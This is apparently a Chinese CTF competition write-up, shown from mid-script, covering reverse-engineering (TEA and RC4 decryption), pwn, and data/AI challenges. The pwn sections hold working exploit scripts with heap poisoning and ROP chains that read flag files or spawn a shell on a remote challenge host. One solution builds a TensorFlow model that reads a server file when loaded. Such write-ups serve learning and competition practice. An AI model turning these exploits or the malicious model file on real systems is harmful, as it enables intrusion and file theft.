d1.value -= ((d2.value<<4) + k0) ^ ((d2.value>>4) + k1) ^ (d2.value + number.value)
number.value -= delta
return d1.value,d2.value
def ast_dec(high, low, e, f):
delta = 0x12345678
high = c_uint16(high)
low = c_uint16(low)
k0 = e & 0xffff
k1 = (e >> 16) & 0xffff
k2 = (e ^ f) & 0xffff
k3 = ((e >> 8 ^ f)) & 0xffff
sum = (delta * (f+1)) & 0xffffffff
low.value -= ((high.value<<5) + k2) ^ ((high.value>>5) + k3) ^ (high.value + sum)
high.value -= ((low.value<<5) + k0) ^ ((low.value>>5) + k1) ^ (low.value + sum)
return (high.value, low.value)
def key_dec(key_data):
key = []
for i in range(8,0,-1):
key_data[i-1], key_data[i] = tea_decrypt(
key_data[i-1], key_data[i], 2025
)
for id, word in enumerate(key_data):
magic = id * id
high,low = spilt_word(word)
high,low = ast_dec(high, low, id+2025, magic)
key.append(combine_word(high,low))
print(f"key: {key}")
return key
def RC4_crypt(data,key,origin_key):
length = len(key)
S = [m for m in range(256)]
T = [key[n % length] for n in range(256)]
j = 0
for i in range(256):
j = (j + S[i] + T[i]) % 256
S[i],S[j] = S[j],S[i]
i = j = t = 0
for k in range(len(data)):
i = (i + 1) % 256
j = (j + S[i]) % 256
if k % 2 == 0:
add_key = origin_key[k % 9]
else:
add_key = (origin_key[k % 9] * 2) % 0xFFF
t = (S[i] + S[j] + k % 23) % 256
S[i],S[j] = S[j],S[i]
data[k] ^= S[t] + add_key
return data
key_list = [105084753, 3212558540, 351342182, 844102737, 2002504052, 356536456, 2463183122, 615034880, 1156203296]
cipher = [1473, 3419, 9156, 1267, 9185, 2823, 7945, 618, 7036, 2479, 5791, 1945, 4639, 1548, 3634, 3502, 2433, 1407, 1263, 3354, 9274, 1085, 8851, 3022, 8031, 734, 6869, 2644, 5798, 1862, 4745, 1554, 3523, 3631, 2512, 1499, 1221, 3226, 9237]
origin_key = key_dec(key_list)
rc4_key = [i % 0xff for i in origin_key]
flag = RC4_crypt(cipher,rc4_key,origin_key)
print(bytes(flag))
#key: [1234, 5678, 9123, 4567, 8912, 3456, 7891, 2345, 6789]
#b'flag{8561a-852sad-7561b-asd-4896-qwx56}'easyTauri | solved
先解包,拿到前端的js文件。逐个分析,关键逻辑在html_actuator.js
去混淆,看出是一个RC4
(function (a, c) {
const d = b;
const e = a();
while (true) {
try {
const a = parseInt(d(176)) / 1 + parseInt(d(172)) / 2 + parseInt(d(170)) / 3 + -parseInt(d(171)) / 4 + -parseInt(d(167)) / 5 * (parseInt(d(168)) / 6) + -parseInt(d(174)) / 7 * (-parseInt(d(166)) / 8) + -parseInt(d(173)) / 9;
if (a === c) {
break;
} else {
e.push(e.shift());
}
} catch (a) {
e.push(e.shift());
}
}
})(c, 452532);
function a(a, c) {
const d = b;
const e = new TextEncoder()[d(169)](a);
const f = new TextEncoder()[d(169)](c);
const g = new Uint8Array(256);
let h = 0;
for (let b = 0; b < 256; b++) {
g[b] = b;
h = (h + g[b] + e[b % e[d(175)]]) % 256;
[g[b], g[h]] = [g[h], g[b]];
}
let i = 0;
let j = 0;
const k = new Uint8Array(f[d(175)]);
for (let b = 0; b < f[d(175)]; b++) {
i = (i + 1) % 256;
j = (j + g[i]) % 256;
[g[i], g[j]] = [g[j], g[i]];
const a = (g[i] + g[j]) % 256;
k[b] = f[b] ^ g[a];
}
return k;
}
function b(a, d) {
const e = c();
b = function (a, b) {
a = a - 166;
let c = e[a];
return c;
};
return b(a, d);
}
function c() {
const a = ["3283052tzDAvB", "542866JdmzNj", "4112658rTyTXQ", "16954tUYpad", "length", "457163LwGIuU", "2696pusaTH", "233035azfeoA", "66oGYEyB", "encode", "2094372kZRrIa"];
c = function () {
return a;
};
return c();
}在Console先跑一下加密函数,提取密钥流
继续找后端的实现。注意到混淆后面的代码提到invoke ipc_command
async function _0x9a2c6e7() {
greetInputEl = document.querySelector("#greet-input");
greetMsgEl = document.querySelector("#greet-msg");
let getFlag = greetInputEl.value;
const ciphertext = Encrypt_0xa31304("SadTongYiAiRC4HH", getFlag);
greetMsgEl.textContent = await invoke("ipc_command", { name: uint8ArrayToBase64(ciphertext) });
}
window.addEventListener("DOMContentLoaded", () => {
document.getElementById("check-form").addEventListener("submit", (e) => {
e.preventDefault();
_0x9a2c6e7();
});
});去IDA中查找,能找到一样的字符串。紧挨着还有一个可疑的Base64字符串,判断是密文
交叉引用,进一步定位到后端rust函数
具体逻辑是:魔改TEA -> 标准base64 -> 比较密文
#include<stdio.h>
#include<string.h>
char std_table[] = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
void base64_decode(unsigned char *encoded, char *table, unsigned char *decode)
{
char temp[4] = {0}, chr, *index;
int length = strlen(encoded);
for (int i = 0; i*4 < length; i++)
{
for (int j = 0; j < 4; j++)
{
chr = encoded[i*4+j];
index = strchr(table,chr);
temp[j] = (index==NULL)? 0: index-table;
}
*(decode + i*3) = (temp[0] << 2) | (temp[1] >> 4);
*(decode + i*3 + 1) = (temp[1] << 4) | (temp[2] >> 2);
*(decode + i*3 + 2) = (temp[2] << 6) | temp[3];
}
//printf("%s",decode);
}
void tea_decry_BE(unsigned int *data, unsigned int *key)
{
unsigned int d1, d2;
unsigned int round = 32;
unsigned int delta = 0x7e3997b7, number = delta * round;
d1 = ((data[0] & 0xFF) << 24) | (((data[0] >> 8) & 0xFF) << 16);
d1 |= (((data[0] >> 16) & 0xFF) << 8) | ((data[0] >> 24) & 0xFF);
d2 = ((data[1] & 0xFF) << 24) | (((data[1] >> 8) & 0xFF) << 16);
d2 |= (((data[1] >> 16) & 0xFF) << 8) | ((data[1] >> 24) & 0xFF);
for (int i = 0; i < round; i++)
{
d2 -= ((d1<<4) + key[2]) ^ ((d1>>5) + key[3]) ^ (d1 + number);
d1 -= ((d2<<4) + key[0]) ^ ((d2>>5) + key[1]) ^ (d2 + number);
number -= delta;
}
data[0] = d1;
data[1] = d2;
}
int main()
{
unsigned char decdata[64];
unsigned char data[] = {
0x75,0xa1,0x7f,0x0e,0x44,0x31,0x8b,0x11,0xa6,0xce,0x7d,0x1a,0x3c,0x55,0xb6,0x13,
0x63,0xe1,0x33,0xc3,0x5a,0x6d,0x1b,0x4b,0x8e,0x9e,0xa9,0x23,0xe7,0x3c,0x4e,0xd6,
0x37,0x58,0xcb,0x8f,0xc5,0xf9,0xef,0x94,0x0b,0x29,0xf5,0xa9,0x6e,0x7f,0xc9,0xe8,
0x67,0x2f,0xd3,0xe9,0x2c,0xfd,0x0c,0x98
};
unsigned int tea_key[] = {
0x636c6557,0x74336d4f,0x73757230,0x55615474
};
unsigned int xor_stream[] = {
137, 97, 135, 0, 97, 97, 57, 57, 97, 23, 136,
97, 58, 105, 124, 180, 97, 129, 221, 154, 157,
117, 117, 97, 97, 97, 97, 97, 97, 97, 191, 22,
97, 97, 208, 97, 97, 97, 97, 97, 97, 97
};
unsigned int *Data = (unsigned int *)data;
for(int i=0;i<7;i++)
{
tea_decry_BE(Data+2*i,tea_key);
}
printf("%s\n",data);
base64_decode(data,std_table,decdata);
for(int j=0;j<42;j++)
{
decdata[j] ^= xor_stream[j] ^ 97;
}
printf("%s\n",decdata);
return 0;
}Pwn
malloc | solved
from pwn import *
#io=process('./pwn')
#context.log_level='debug'
io=remote("45.40.247.139",15853)
libc=ELF('./libc.so.6')
def bug():
gdb.attach(io)
def ch(Id):
io.recvuntil(b"=======================")
io.sendline(str(Id).encode())
def add(Id,size):
ch(1)
io.sendlineafter(b"Index",str(Id).encode())
io.sendlineafter(b"size",str(size).encode())
def free(Id):
ch(2)
io.sendlineafter(b"Index",str(Id).encode())
def edit(Id,size,payload):
ch(3)
io.sendlineafter(b"Index",str(Id).encode())
io.sendlineafter(b"size",str(size).encode())
io.send(payload)
def show(Id):
ch(4)
io.sendlineafter(b"Index",str(Id).encode())
add(0,0x70)
add(1,0x70)
free(1)
free(0)
show(0)
io.recvline()
pie=u64(io.recv(6)+b'\x00\x00')-0x5280
print(hex(pie))
add(0,0x70)
add(1,0x70)
free(0)
add(2,0x70)
free(0)
edit(2,0x10,p64(pie+0x40C0-0x10))
add(0,0x70)
add(1,0x70)
show(1)
io.recvline()
base=u64(io.recv(6)+b'\x00\x00')-0x21b780
print(hex(base))
add(0,0x60)
free(0)
add(1,0x60)
free(0)
stack=base+libc.sym.environ
edit(1,0x10,p64(stack-0x10))
add(0,0x60)
add(1,0x60)
show(1)
io.recvline()
stack=u64(io.recv(6)+b'\x00\x00')-0x140#8
print(hex(stack))
add(0,0x50)
free(0)
add(1,0x50)
free(0)
edit(1,8,p64(stack-0x10))
add(0,0x50)
edit(0,0x18,b"./flag.txt\x00")
add(1,0x50)
rdi=base+0x000000000002a3e5
rsi=base+0x000000000002be51
rdx=base+0x000000000011f357#double
read=base+libc.sym.read
payload=p64(rdi)+p64(0)+p64(rsi)+p64(stack+0x38)+p64(rdx)+p64(0x400)*2+p64(read)
edit(1,0x50,payload)
pause()
flag=stack+0x38
payload =b"./flag\x00\x00"+p64(rdi)+p64(flag)+p64(rsi)+p64(0)+p64(rdx)+p64(0)*2+p64(base+libc.sym.open)
payload+=p64(rdi)+p64(3)+p64(rsi)+p64(stack+0x200)+p64(rdx)+p64(0x50)*2+p64(base+libc.sym.read)
payload+=p64(rdi)+p64(1)+p64(base+libc.sym.write)
io.send(payload)
io.interactive()自定义了malloc系统
其中重要的逻辑,复刻了bins和堆顶指针的逻辑
Add:
__int64 __fastcall malloc(int a1)
{
int ptr; // [rsp+1Ch] [rbp-14h]
unsigned int n8; // [rsp+20h] [rbp-10h]
int idx; // [rsp+24h] [rbp-Ch]
__int64 v5; // [rsp+28h] [rbp-8h]
__int64 list; // [rsp+28h] [rbp-8h]
n8 = a1 & 0xF;
if ( n8 > 8 ) // 对齐
ptr = a1 - n8 + 32;
else
ptr = a1 - n8 + 16;
idx = ptr / 16;
if ( bins[ptr / 16] ) // bins有堆块
{
v5 = bins[idx];
bins[idx] = *(_QWORD *)(v5 + 0x10);
*(_BYTE *)v5 = 1;
return v5 + 16;
}
else
{
if ( ptr >= (unsigned __int64)ptr )
{
puts("malloc(): corrupted top chunks");
exit(0);
}
list = list_0;
*(_BYTE *)list_0 = 1;
*(_DWORD *)(list + 8) = ptr;
list_0 += ptr;
ptr -= ptr;
*(_DWORD *)(list_0 + 8) = ptr;
return list + 16;
}
}"堆"位于bss段
__int64 __fastcall Free(unsigned int n0x10)
{
int v1; // kr00_4
__int64 result; // rax
int n13; // [rsp+14h] [rbp-1Ch]
__int64 v4; // [rsp+20h] [rbp-10h]
__int64 v5; // [rsp+28h] [rbp-8h]
v5 = list[n0x10 + 0x200] - 16LL;
v1 = *(_DWORD *)(v5 + 8);
*(_QWORD *)list[n0x10 + 0x200] = bins[v1 / 16];
bins[v1 / 16] = v5;
*(_BYTE *)v5 = 0;
n13 = 0;
result = *(_QWORD *)(bins[v1 / 16] + 16LL);
v4 = result;
while ( n13 <= 13 && v4 )
{
if ( v4 == v5 )
{
puts("free(): double free or corruption (fast)");
exit(0);
}
result = *(_QWORD *)(v4 + 16);
v4 = result;
++n13;
}
return result;
}存在double_free检查
在增删改查中 :
delet函数,只将size成员改成了0,但没有清理指针
于是我们可以利用uaf,leak出pie
add(0,0x70)
add(1,0x70)
free(1)
free(0)
show(0)
io.recvline()
pie=u64(io.recv(6)+b'\x00\x00')-0x5280并进行next污染劫持got表/IO指针获取libc地址
add(0,0x70)
add(1,0x70)
free(0)
add(2,0x70)
free(0)
edit(2,0x10,p64(pie+0x40C0-0x10))
add(0,0x70)
add(1,0x70)
show(1)
io.recvline()
base=u64(io.recv(6)+b'\x00\x00')-0x21b780最后劫持environ指针,leak栈地址,进行栈溢出,使用orw的ROP打印flag
需要二次注入ROP,单次写的长度不足
add(0,0x60)
free(0)
add(1,0x60)
free(0)
stack=base+libc.sym.environ
edit(1,0x10,p64(stack-0x10))
add(0,0x60)
add(1,0x60)
show(1)
io.recvline()
stack=u64(io.recv(6)+b'\x00\x00')-0x140#8
print(hex(stack))
add(0,0x50)
free(0)
add(1,0x50)
free(0)
edit(1,8,p64(stack-0x10))
add(0,0x50)
edit(0,0x18,b"./flag.txt\x00")
add(1,0x50)
rdi=base+0x000000000002a3e5
rsi=base+0x000000000002be51
rdx=base+0x000000000011f357#double
read=base+libc.sym.read
payload=p64(rdi)+p64(0)+p64(rsi)+p64(stack+0x38)+p64(rdx)+p64(0x400)*2+p64(read)
edit(1,0x50,payload)
pause()
flag=stack+0x38
payload =b"./flag\x00\x00"+p64(rdi)+p64(flag)+p64(rsi)+p64(0)+p64(rdx)+p64(0)*2+p64(base+libc.sym.open)
payload+=p64(rdi)+p64(3)+p64(rsi)+p64(stack+0x200)+p64(rdx)+p64(0x50)*2+p64(base+libc.sym.read)
payload+=p64(rdi)+p64(1)+p64(base+libc.sym.write)
io.send(payload)
io.interactive()stack | solved
from pwn import *
#io=process('./pwn')
libc=ELF('./libc.so.6')
#context.log_level='debug'
io=remote("45.40.247.139",18789)
payload=p64(0)+p64(0x291)+b'\x00'*0xf8+p8(0x5f)
#gdb.attach(io)
io.send(payload)
io.recvuntil(b"magic number:")
base=int(io.recvline()[:-1],10)
base=base//4
base=base-0x16B0
pie=base
print(hex(base))
ret=base+0x16D5
printf=base+0x1150
#gdb.attach(io)
payload =p64(0)+p64(0x291)+b'\x00'*0xf8
payload+=p64(base+0x12C9)+p64(ret)+p64(base+0x163A)
io.send(payload)
io.recvuntil(b"Good luck!\n")
base=u64(io.recv(6)+b'\x00\x00')-0x21b780
print(hex(base))
rdi=base+0x000000000002a3e5
rsi=base+0x000000000002be51
rdx=base+0x000000000011f357
rcx=base+0x000000000003d1ee
rbp=base+0x000000000002a2e0
rbx=base+0x0000000000035dd1
#gdb.attach(io)
magic=pie+0x12B2
payload =p64(0)+p64(0x291)+b'\x00'*0xe0
payload+=p64(ret)*0x10
payload+=p64(rbp)+p64(pie+0x4200+0x3d)+p64(rbx)+p64(0x67616C66)+p64(magic)
payload+=p64(rdi)+p64(0x10000000000000000-100)+p64(rsi)+p64(pie+0x4200)+p64(rdx)+p64(0)*2+p64(base+libc.sym.openat)
payload+=p64(rdi)+p64(1)+p64(rsi)+p64(3)+p64(rdx)+p64(0)*2+p64(rcx)+p64(0x100)+p64(base+libc.sym.sendfile)
io.send(payload)
io.interactive()
mian中存在两个函数,init和work
其中init函数进行了一些初始化:设置了一个3/4的随机数,设置了一个全局变量(于PIE有关),开启了沙箱
清空了这个tachebins并将heap设置到了heap_base
以及将一枚函数指针(exit_0)设置到堆上(重点)
最后设置旗帜n2_0为0
work函数可以从堆基址写入0x2000字节,且每次 调用work都会为旗帜n2_0+=1
如果n2_0>2则work无法返回
work函数的结尾有一段奇怪的汇编,这段汇编会将栈迁移到堆上,返回地址为init设置的函数指针
如果我们想写入ROP,就要从read(0,heap,0x2000)溢出
由于程序开启了PIE,导致我们无法直接ROP
程序中存在magic,可以打印出main地址与随机数的乘积
所以可以泄露pie,并再次进入work函数
此时可以利用elf中的gadget进行rop
在这个魔术链中可以获取stdout中的值到rax中
跳回work可以将_2_1_stdout打印出来
此时获得了libc地址,随后进行最后一次溢出,注入orw的ROP即可
Mvmps | solved
from pwn import *
elf = ELF("./pwn")
libc = ELF("./libc.so.6")
#io = remote("45.40.247.139", 22327)
io=process('./pwn')
def val(op):
return ord(op) if isinstance(op, str) else op
def rgs0(buf, choice, num):
b0 = ((val(choice) << 2) | 0) & 0xff
buf += bytes([b0]) + (num & 0xffffff).to_bytes(3, 'big')
return buf
def rgs1(buf, choice, r):
b0 = ((val(choice) << 2) | 1) & 0xff
buf += bytes([b0, r & 0xff])
return buf
def rgs2(buf, choice, a, b):
b0 = ((val(choice) << 2) | 2) & 0xff
buf += bytes([b0, a & 0xff, b & 0xff])
return buf
def rgs3(buf, choice, r, imm):
b0 = ((val(choice) << 2) | 3) & 0xff
buf += bytes([b0, r & 0xff]) + p32(imm & 0xffffffff)
return buf
sp_alloc = lambda buf, n: rgs0(buf, '$', n)
sp_free = lambda buf, n: rgs0(buf, '%', n)
mov_rgstoi = lambda buf, r, i: rgs3(buf, 3, r, i)
add_rgstoi = lambda buf, r, i: rgs3(buf, 10, r, i)
mov_rgstorgs = lambda buf, a, b: rgs2(buf, 3, a, b)
add_rgstorgs = lambda buf, a, b: rgs2(buf, 10, a, b)
shl_rgstoi = lambda buf, r, i: rgs3(buf, 7, r, i)
shr_rgstoi = lambda buf, r, i: rgs3(buf, 8, r, i)
push_rgs = lambda buf, r: rgs1(buf, 31, r)
pop_rgs = lambda buf, r: rgs1(buf, 32, r)
def push_p64(buf, base, off, tmp=3):
buf = mov_rgstorgs(buf, tmp, base)
buf = add_rgstoi(buf, tmp, off)
buf = push_rgs(buf, tmp)
buf = shr_rgstoi(buf, tmp, 32)
buf = sp_free(buf, 2)
buf = push_rgs(buf, tmp)
buf = sp_free(buf, 2)
return buf
buf = bytearray()
binsh = next(libc.search(b"/bin/sh"))
system = libc.symbols.system
pop_rdi = 0x2a3e5
pop_rsp = 0x35732
ret = 0x35733
#=-=========================================leak libc
payload = sp_alloc(buf, 0x420)
payload = pop_rgs(buf, 0)
payload = pop_rgs(buf, 1)
payload = add_rgstoi(buf, 0, -1*libc.sym.puts)
payload = shl_rgstoi(buf, 0, 32)
payload = shr_rgstoi(buf, 0, 32)
payload = shl_rgstoi(buf, 1, 32)
payload = add_rgstorgs(buf, 0, 1)
payload = mov_rgstorgs(buf, 2, 0)
#===========================================make ROP
payload = sp_free(buf, 0x201)
payload = push_p64(buf, 2, pop_rdi)
payload = push_p64(buf, 2, binsh)
payload = push_p64(buf, 2, ret)
payload = push_p64(buf, 2, system)
#===========================================stack hijack
payload = sp_alloc(buf, 0x20f)
payload = mov_rgstoi(buf, 5, 0)
payload = mov_rgstoi(buf, 4, 0x405828)
payload = push_rgs(buf, 5)
payload = push_rgs(buf, 4)
payload = sp_free(buf, 3)
payload = push_p64(buf, 2, pop_rsp)
payload=bytes(payload)
#============================================
io.send(payload)
io.interactive()通过对自定义指令集的逆向,将opcode对应的指令集制作出来
def val(op):
return ord(op) if isinstance(op, str) else op
def rgs0(buf, choice, num):
b0 = ((val(choice) << 2) | 0) & 0xff
buf += bytes([b0]) + (num & 0xffffff).to_bytes(3, 'big')
return buf
def rgs1(buf, choice, r):
b0 = ((val(choice) << 2) | 1) & 0xff
buf += bytes([b0, r & 0xff])
return buf
def rgs2(buf, choice, a, b):
b0 = ((val(choice) << 2) | 2) & 0xff
buf += bytes([b0, a & 0xff, b & 0xff])
return buf
def rgs3(buf, choice, r, imm):
b0 = ((val(choice) << 2) | 3) & 0xff
buf += bytes([b0, r & 0xff]) + p32(imm & 0xffffffff)
return buf
sp_alloc = lambda buf, n: rgs0(buf, '$', n)
sp_free = lambda buf, n: rgs0(buf, '%', n)
mov_rgstoi = lambda buf, r, i: rgs3(buf, 3, r, i)
add_rgstoi = lambda buf, r, i: rgs3(buf, 10, r, i)
mov_rgstorgs = lambda buf, a, b: rgs2(buf, 3, a, b)
add_rgstorgs = lambda buf, a, b: rgs2(buf, 10, a, b)
shl_rgstoi = lambda buf, r, i: rgs3(buf, 7, r, i)
shr_rgstoi = lambda buf, r, i: rgs3(buf, 8, r, i)
push_rgs = lambda buf, r: rgs1(buf, 31, r)
pop_rgs = lambda buf, r: rgs1(buf, 32, r)开始攻击,第一步获得libc基地址
payload = sp_alloc(buf, 0x420)
payload = pop_rgs(buf, 0)
payload = pop_rgs(buf, 1)
payload = add_rgstoi(buf, 0, -1*libc.sym.puts)
payload = shl_rgstoi(buf, 0, 32)
payload = shr_rgstoi(buf, 0, 32)
payload = shl_rgstoi(buf, 1, 32)
payload = add_rgstorgs(buf, 0, 1)
payload = mov_rgstorgs(buf, 2, 0)此时可以泄露出puts的got表中的真实地址,减去puts的真实地址得到libc基址
然后在vm自定义的堆栈区域构造出rop链
payload = sp_free(buf, 0x201)
payload = push_p64(buf, 2, pop_rdi)
payload = push_p64(buf, 2, binsh)
payload = push_p64(buf, 2, ret)
payload = push_p64(buf, 2, system)最后使用pop rsp进行栈迁移,执行刚刚布置的ROP
即可执行system("/bin/sh")
payload = sp_alloc(buf, 0x20f)
payload = mov_rgstoi(buf, 5, 0)
payload = mov_rgstoi(buf, 4, 0x405828)
payload = push_rgs(buf, 5)
payload = push_rgs(buf, 4)
payload = sp_free(buf, 3)
payload = push_p64(buf, 2, pop_rsp)
payload=bytes(payload)DS&Ai
SM4-OFB | solved
题目名就可以看出采用了SM4-OFB加密,OFB下密文只是明文和密钥流xor的结果,同时密钥流是相对独立地生成的(仅和iv和密钥有关)
注意到每行的iv是固定的,推测密钥相同,故直接上明文攻击,xor一下就有密钥(测试过程略去,结论是每个单元格是分别加密的),后面就比较 trivial 了
from pwn import xor
from Crypto.Util.Padding import pad,unpad
from hashlib import md5
import pandas as pd
def getkey():
a = bytes.fromhex('1451374401262f5d9ca4657bcdd9687eac8baace87de269e6659fdbc1f3ea41c')
org = pad(str(220000197309078766).encode(),16)
key = xor(org,a)
return key
file_path = './competition/dasctf2025/个人信息表.xlsx'
df = pd.read_excel(file_path, sheet_name=0, header=None)
key = getkey()
for i in range(1,1000):
row = df.iloc[i]
name = unpad(xor(bytes.fromhex(row[1]),key,cut='min'),16)
# breakpoint()
if name == "何浩璐".encode():
f = unpad(xor(bytes.fromhex(row[3]),key,cut='min'),16)
print(f)
print(md5(f).hexdigest())
break
# b'120000197404101676'
# fbb80148b75e98b18d65be446f505fccdataIdSort | solved
sort.py
import re
import csv
def extract_and_save(filename):
# 身份证模式
id_pattern = r'\d{17}[\dXx]|\d{6}-\d{8}-[\dXx]{4}|\d{6} \d{8} [\dXx]{4}'
id_coefficients = [7, 9, 10, 5, 8, 4, 2, 1, 6, 3, 7, 9, 10, 5, 8, 4, 2]
id_check_table = {0: '1', 1: '0', 2: 'X', 3: '9', 4: '8', 5: '7', 6: '6', 7: '5', 8: '4', 9: '3', 10: '2'}
common_bankcard_prefixes = {
'622848', '622700', '621700', '622262', '622188',
'622200', '622568', '622609', '622908', '622518'
}
def is_valid_id(id_str):
clean = id_str.replace('-', '').replace(' ', '')
if len(clean) != 18:
return False
try:
if clean[:6] in common_bankcard_prefixes:
return False
total = sum(int(clean[i]) * id_coefficients[i] for i in range(17))
remainder = total % 11
expected = id_check_table[remainder]
return expected == clean[17].upper()
except:
return False
phone_pattern = r'(?:\(\+86\)|\+86)?\s*(\d{3}(?:[\s\-]\d{4}[\s\-]\d{4}|\d{8}))'
valid_prefixes = {
'134', '135', '136', '137', '138', '139', '147', '148', '150', '151', '152', '157', '158', '159', '172', '178',
'182', '183', '184', '187', '188', '195', '198', '130', '131', '132', '140', '145', '146', '155', '156', '166',
'167', '171', '175', '176', '185', '186', '196', '133', '149', '153', '173', '174', '177', '180', '181', '189',
'190', '191', '193', '199'
}
def is_valid_phone(phone_str):
clean = re.sub(r'[^\d]', '', phone_str)
if len(clean) != 11 and len(clean) != 13:
return False
if len(clean) == 11:
return clean[:3] in valid_prefixes
if len(clean) == 13:
return clean[2:5] in valid_prefixes
# 银行卡号模式
bankcard_pattern = r'(?<!\d)\d{16,19}(?!\d)'
common_bankcard_prefixes = {
'622848', '622700', '621700', '622262', '622188',
'622200', '622568', '622609', '622908', '622518'
}
def luhn_check(card_number):
"""Luhn算法校验"""
total = 0
# 从右到左遍历
for i, digit in enumerate(reversed(card_number)):
num = int(digit)
if i % 2 == 1: # 偶数位(从右往左数,索引从0开始)
num *= 2
if num > 9:
num = num // 10 + num % 10 # 各位数字相加
total += num
return total % 10 == 0
def is_valid_bankcard(card_str):
"""验证银行卡号"""
# 检查长度
if len(card_str) < 16 or len(card_str) > 19:
return False
# 检查是否全为数字
if not card_str.isdigit():
return False
# 检查常见前缀
has_common_prefix = any(card_str.startswith(prefix) for prefix in common_bankcard_prefixes)
if not has_common_prefix:
return False
# Luhn算法校验
return luhn_check(card_str)
# IP地址模式
ip_pattern = r'(?<!\d)(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)(?!\d)'
def is_valid_ip(ip_str):
parts = ip_str.split('.')
if len(parts) != 4:
return False
for part in parts:
if not 0 <= int(part) <= 255:
return False
return True
# MAC地址模式
mac_pattern = r'[0-9A-Fa-f]{2}:[0-9A-Fa-f]{2}:[0-9A-Fa-f]{2}:[0-9A-Fa-f]{2}:[0-9A-Fa-f]{2}:[0-9A-Fa-f]{2}'
def is_valid_mac(mac_str):
return True
results = []
with open(filename, 'r', encoding='utf-8') as f:
content = f.read()
check = [] # 用于排除手机号取身份证前11位的情况
# 身份证匹配
for match in re.findall(id_pattern, content):
if is_valid_id(match):
check.append(match[:11])
results.append(['idcard', match])
# 手机号匹配
for match in re.finditer(phone_pattern, content):
full_match = match.group()
if is_valid_phone(full_match):
if full_match[0] == " ":
full_match = full_match[1:len(full_match)]
if full_match not in check:
results.append(['phone', full_match.strip() ])
# 银行卡号匹配
bankcard_matches = re.findall(bankcard_pattern, content)
for match in bankcard_matches:
if is_valid_bankcard(match):
results.append(['bankcard', match])
# IP地址匹配
ip_matches = re.findall(ip_pattern, content)
for match in ip_matches:
if is_valid_ip(match):
results.append(['ip', match])
# MAC地址匹配
mac_matches = re.findall(mac_pattern, content)
for match in mac_matches:
if is_valid_mac(match):
results.append(['mac', match])
with open('output.csv', 'w', newline='', encoding='utf-8') as f:
writer = csv.writer(f)
writer.writerow(['category', 'value'])
writer.writerows(results)
extract_and_save('data.txt')
满天繁星 | solved
假设星星在特征空间中的位置决定了它属于哪个星团,且最近的已知样本能正确分类:
import numpy as np
from scipy.spatial import distance
from sklearn.preprocessing import StandardScaler
# 加载数据
data = np.loadtxt("data.npy.gz")
core_data = np.loadtxt("known_samples.npy.gz")
print("数据形状 - core_data:", core_data.shape, "data:", data.shape)
all_data = np.vstack((core_data, data))
class_count = len(core_data)
# 方法1:尝试标准化
scaler = StandardScaler()
all_data_scaled = scaler.fit_transform(all_data)
out_labels = np.full((all_data.shape[0],), -1)
out_labels[:256] = np.arange(256)
# 使用标准化后的数据计算距离
dists = distance.cdist(all_data_scaled[256:], all_data_scaled[:256], metric='euclidean')
nearest = np.argmin(dists, axis=1)
out_labels[256:] = nearest
# 检查结果分布
unique, counts = np.unique(out_labels[256:], return_counts=True)
print("各类别样本数:", dict(zip(unique, counts)))
# 生成文件
file_data = bytes(out_labels[256:].astype(np.uint8))
print("生成的文件长度:", len(file_data))
print("文件头:", file_data[:4].hex())
print("文件尾:", file_data[-4:].hex())
with open("flag_debug.jpg", "wb") as f:
f.write(file_data)
print("文件已保存为 flag_debug.jpg")
Mini-modelscope | solved
直接上个月的ccb原题??
https://blog.csdn.net/Aluxian_/article/details/151867798
# build_model_tfio.py
# 使用纯 TensorFlow op 在 Graph 中读取 /flag 并作为 signature 返回
# 运行环境需要安装 tensorflow (建议 tensorflow-cpu)
#
# 生成: model.zip
import os
import zipfile
try:
import tensorflow as tf
except Exception as e:
raise SystemExit("请先安装 TensorFlow: pip install tensorflow-cpu\n错误: " + str(e))
OUT_DIR = "model_saved"
ZIP_PATH = "model.zip"
# 清理
if os.path.exists(OUT_DIR):
import shutil
shutil.rmtree(OUT_DIR)
if os.path.exists(ZIP_PATH):
os.remove(ZIP_PATH)
# 纯 TF 的 serve 函数:在 Graph 中读取 /flag,确保返回 tf.Tensor (dtype=tf.string)
@tf.function(input_signature=[tf.TensorSpec(shape=[None, 1], dtype=tf.float32)])
def serve_fn(x):
# tf.io.read_file 是一个图操作,返回 tf.Tensor(dtype=tf.string, shape=())
data = tf.io.read_file("/flag")
# 为兼容一些加载器/调用方,明确设置形状(标量),或者扩展成 [batch] 形式:
# 1) 若调用端期待标量 string:直接返回 data
# 2) 若调用端以 batch 形式调用(输入是 [N,1]),可以把 data 扩成 [N]
# 下面示例把 data 重复为与输入 batch size 相同的向量
batch_size = tf.shape(x)[0]
data_vec = tf.repeat(tf.expand_dims(data, 0), repeats=batch_size) # shape [batch_size]
# 返回 dict,prediction 保持为 shape [batch_size] 的 tf.string 张量
return {"prediction": data_vec}
# 备用的纯 TF signature(不读取文件),便于测试加载器是否能读取 SavedModel
@tf.function(input_signature=[tf.TensorSpec(shape=[None, 1], dtype=tf.float32)])
def noop_fn(x):
batch_size = tf.shape(x)[0]
const = tf.constant("MODEL_OK", dtype=tf.string)
vec = tf.repeat(tf.expand_dims(const, 0), repeats=batch_size)
return {"prediction": vec}
# 保存 Module,并显式把 "serve" signature 写入
class ModelModule(tf.Module):
@tf.function(input_signature=[tf.TensorSpec(shape=[None, 1], dtype=tf.float32)])
def __call__(self, x):
return serve_fn(x)
module = ModelModule()
tf.saved_model.save(module, OUT_DIR, signatures={"serve": serve_fn, "noop": noop_fn})
# 打包为 zip
with zipfile.ZipFile(ZIP_PATH, "w", compression=zipfile.ZIP_DEFLATED) as zf:
for root, dirs, files in os.walk(OUT_DIR):
for fname in files:
full = os.path.join(root, fname)
arcname = os.path.relpath(full, OUT_DIR)
zf.write(full, arcname)
print("SavedModel saved to:", OUT_DIR)
print("Zipped to:", ZIP_PATH)
最新评论